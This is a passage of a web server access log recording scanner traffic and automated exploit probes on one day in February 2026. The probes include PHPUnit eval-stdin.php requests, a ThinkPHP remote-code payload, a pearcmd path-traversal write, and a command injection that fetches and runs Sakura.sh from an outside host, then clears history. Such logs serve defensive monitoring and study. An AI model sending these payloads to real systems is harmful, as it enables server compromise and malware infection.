"/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:14 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:15 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:16 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:17 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:18 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:19 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:20 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:22 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:23 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:24 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:25 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:26 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:27 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:28 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:30 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:31 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:32 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:33 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:34 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:36 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:46:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:12:49:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.135.142.7] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:12:50:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:12:56:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.241] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:13:10:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:13:14:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.70] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:14:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.70] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:15:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:13:17:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:13:19:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:13:20:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:20:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:13:24:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:13:43:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:13:53:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:14:01:57 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[15/Feb/2026:14:09:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:14:11:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:14:17:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.135.36.201] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:14:20:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:14:21:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:14:22:22 +0000] 404 - GET http 222.117.41.51 "/dispatch.asp" [Client 195.3.221.86] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:14:38:18 +0000] 404 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 35.203.211.208] [Length 150] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[15/Feb/2026:14:43:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 220.197.188.164] [Length 1033] [Gzip -] "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-" -[15/Feb/2026:15:00:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:15:06:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:15:08:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:15:16:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:15:25:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:15:49:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:15:59:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:16:03:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:16:12:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:16:14:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:16:40:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:00:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:03:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:09:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:15:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 46.23.108.183] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" -[15/Feb/2026:17:26:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:17:29:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:38:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:17:40:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 34.79.198.196] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" -[15/Feb/2026:17:42:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.131.220.121] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[15/Feb/2026:17:43:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.131.220.121] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[15/Feb/2026:17:45:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.131.220.121] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:17:48:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.131.220.121] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:17:53:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:17:57:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:18:10:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:18:20:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:18:35:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:18:41:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 52.180.145.88] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[15/Feb/2026:18:44:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:18:46:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:18:53:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 18.116.101.220] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[15/Feb/2026:18:55:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.171.32.24] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:18:55:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 18.116.101.220] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[15/Feb/2026:18:56:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 0] [Gzip -] "-" "-" -[15/Feb/2026:18:57:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 167.94.146.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:18:57:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.57] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:18:57:03 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:18:57:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.57] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:18:57:07 +0000] 404 - GET http 222.117.41.51 "/security.txt" [Client 167.94.146.57] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:18:57:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.57] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:18:58:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:18:59:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:19:01:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:19:05:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:19:12:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:19:22:45 +0000] 400 - GET http 222.117.41.51 "/" [Client 98.80.4.119] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3100.65 Safari/537.32" "-" -[15/Feb/2026:19:36:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:19:40:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:19:44:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:19:54:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:20:00:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:20:05:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:20:06:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:20:16:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.156.168.214] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:20:26:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:20:48:05 +0000] 404 - GET http 222.117.41.51 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c" [Client 47.121.210.129] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" -[15/Feb/2026:20:49:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:20:50:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:20:51:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:20:58:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:21:11:37 +0000] 400 - - http localhost "-" [Client 80.94.95.83] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:21:17:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 79.121.117.16] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:21:18:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:21:36:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.33.68.58] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:36:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 165.22.136.169] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:37:09 +0000] 404 - GET http 222.117.41.51 "/vpn/js/rdx/core/lang/rdx_en.json.gz" [Client 173.255.221.145] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:37:32 +0000] 404 - POST http 222.117.41.51 "/wsman" [Client 167.99.11.195] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:37:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.189.72.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:37:51 +0000] 404 - GET http 222.117.41.51 "/_layouts/15/error.aspx" [Client 206.189.72.48] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 64.227.19.194] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:11 +0000] 404 - GET http 222.117.41.51 "/auth.html" [Client 64.227.19.194] [Length 183] 